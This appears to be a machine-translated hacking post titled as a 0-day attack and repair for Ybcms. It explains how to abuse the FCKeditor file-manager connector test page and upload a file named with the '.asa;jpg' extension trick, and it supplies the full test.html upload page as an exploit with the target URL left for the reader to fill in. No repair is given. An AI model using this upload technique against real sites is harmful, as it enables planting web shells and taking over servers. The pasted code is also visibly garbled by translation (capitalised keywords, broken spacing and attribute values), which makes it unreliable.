Ybcms kill 0-day attack and repair

 

 

Author: hackdn

Baidu hasn't found it. Just try again.

FCKEDITOR Upload Vulnerability: fck/editor/filemanager/connectors/test.html

 

Upload. asa; jpg

 

If there is no TEST. HTML, save the following EXP. Fill in the URL by yourself

 

 

 

<! --

* FCKeditor-The text editor for Internet-http://www.fckeditor.net

* Copyright (C) 2003-2007 Frederico Caldeira Knabben

*

* = Begin license =

*

* Licensed under the terms of any of the following licenses at your

* Choice:

*

*-GNU General Public License Version 2 or later (the "GPL ")

* Http://www.gnu.org/licenses/gpl.html

*

*-GNU Lesser General Public License Version 2.1 or later (the "LGPL ")

* Http://www.gnu.org/licenses/lgpl.html

*

*-Mozilla Public License Version 1.1 or later (the "MPL ")

* Http://www.mozilla.org/MPL/MPL-1.1.html

*

* = End license =

*

* Test page for the File Browser connectors.

-->

<! Doctype html public "-// W3C // dtd html 4.0 Transitional // EN">

<Html xmlns = "http://www.w3.org/1999/xhtml">

<Head>

<Title> FCKeditor-Connectors Tests </title>

<Script type = "text/javascript">

Function BuildBaseUrl (command)

{

Var sUrl =

Document. getElementById ('cmbconnector'). value +

'? Command = '+ command +

'& Type =' + document. getElementById ('cmbtype'). value +

'& CurrentFolder =' + encodeURIComponent (document. getElementById ('txtfolder'). value );

Return sUrl;

}

Function SetFrameUrl (url)

{

Document. getElementById ('erunningframework'). src = url;

Document. getElementById ('url'). innerHTML = url;

}

Function GetFolders ()

{

SetFrameUrl (BuildBaseUrl ('getfolders '));

Return false;

}

Function GetFoldersAndFiles ()

{

SetFrameUrl (BuildBaseUrl ('getfoldersandfiles '));

Return false;

}

Function CreateFolder ()

{

Var sFolder = prompt ('Type the folder name: ', 'test folder ');

If (! SFolder)

Return false;

Var sUrl = BuildBaseUrl ('createfolder ');

SUrl + = '& NewFolderName =' + encodeURIComponent (sFolder );

SetFrameUrl (sUrl );

Return false;

}

Function OnUploadCompleted (errorNumber, fileName)

{

Switch (errorNumber)

{

Case 0:

Alert ('file uploaded with no errors ');

Break;

Case 201:

GetFoldersAndFiles ();

Alert ('a file with the same name is already available. The uploaded file has been renamed to "'+ fileName + '"');

Break;

Case 202:

Alert ('invalidfile ');

Break;

Default:

Alert ('error on file upload. Error number: '+ errorNumber );

Break;

}

}

This. frames. frmUpload = this;

Function SetAction ()

{

Var sUrl = BuildBaseUrl ('fileupload ');

Document. getElementById ('url'). innerHTML = sUrl;

Document. getElementById ('frmupload'). action = sUrl;

}

</Script>

</Head>

<Body>

<Table height = "100%" cellspacing = "0" cellpadding = "0" width = "100%" border = "0">

 

 

<Tr>

<Td>

<Table cellspacing = "0" cellpadding = "0" border = "0">

<Tr>

<Td>

Connector: <br/>

<Select id = "cmbConnector" name = "cmbConnector">

<Option value = "http://www.bkjia.com // fck/editor/filemanager/connectors/asp/connector. asp" selected = "selected"> ASP </option>

<Option value = "ASP. Net </option '> http: // fck/editor/filemanager/connectors/aspx/connector. asp"> ASP. Net </option>

<Option value = "cfm/connector. cfm"> ColdFusion </option>

<Option value = "lasso/connector. lasso"> Lasso </option>

<Option value = "perl/connector. cgi"> Perl </option>

<Option value = "PHP </option '> http: // fck/editor/filemanager/connectors/php/connector. php"> PHP </option>

<Option value = "py/connector. py"> Python </option>

</Select>

</Td>

<Td>

</Td>

<Td>

Current Folder <br/>

<Input id = "txtFolder" type = "text" value = "/" name = "txtFolder"/> </td>

<Td>

</Td>

<Td>

Resource Type <br/>

<Select id = "cmbType" name = "cmbType">

<Option value = "File" selected = "selected"> File </option>

<Option value = "Image"> Image </option>

<Option value = "Flash"> Flash </option>

<Option value = "Media"> Media </option>

<Option value = "Invalid"> Invalid Type (for testing) </option>

</Select>

</Td>

</Tr>

</Table>

<Br/>

<Table cellspacing = "0" cellpadding = "0" border = "0">

<Tr>

<Td valign = "top">

<A href = "#" onclick = "GetFolders ();"> Get Folders </a> </td>

<Td>

</Td>

<Td valign = "top">

<A href = "#" onclick = "GetFoldersAndFiles ();"> Get Folders and Files </a> </td>

<Td>

</Td>

<Td valign = "top">

<A href = "#" onclick = "CreateFolder ();"> Create Folder </a> </td>

<Td>

</Td>

<Td valign = "top">

<Form id = "frmUpload" action = "" target = "eRunningFrame" method = "post" enctype = "multipart/form-data">

File Upload <br/>

<Input id = "txtFileUpload" type = "file" name = "NewFile"/>

<Input type = "submit" value = "Upload" onclick = "SetAction ();"/>

</Form>

</Td>

</Tr>

</Table>

<Br/>

URL: <span id = "eUrl"> </span>

</Td>

</Tr>

<Tr>

& Lt; td height = "100%" valign = "top" & gt;

<Iframe id = "eRunningFrame" src = "javascript: void (0)" name = "eRunningFrame" width = "100%"

Height = "100%"> </iframe>

</Td>

</Tr>

</Table>

</Body>

</Html>